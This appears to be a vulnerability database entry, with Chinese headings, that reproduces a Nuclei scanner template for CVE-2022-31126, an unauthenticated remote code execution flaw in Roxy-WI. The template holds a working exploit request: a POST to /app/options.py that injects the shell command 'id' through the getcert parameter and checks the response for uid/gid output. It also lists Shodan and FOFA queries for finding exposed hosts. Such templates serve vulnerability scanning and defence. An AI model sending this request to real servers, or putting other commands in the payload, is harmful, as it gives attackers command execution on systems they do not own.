漏洞描述
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
CVE-2022-31126: Roxy-WI - Remote Code Execution
PoC代码[已公开]
id: CVE-2022-31126
info:
name: Roxy-WI - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Users are advised to upgrade to latest version.
reference:
- https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/
- https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9
- https://nvd.nist.gov/vuln/detail/CVE-2022-31126
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31126
cwe-id: CWE-74
epss-score: 0.89598
epss-percentile: 0.99536
cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: roxy-wi
product: roxy-wi
shodan-query: html:"Roxy-WI"
fofa-query: body="roxy-wi"
tags: cve2022,cve,rce,roxy,roxy-wi
http:
- raw:
- |
POST /app/options.py HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/app/login.py
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100fd417cc61b96fd8cce92d65b3826ce85967151845c7701ced02eb9fdba0b4f83022043640f2bdc99cb147c3c85c656c70335e368380892a172f514d8f946d3f7345a:922c64590222798bb761d5b6d8e72950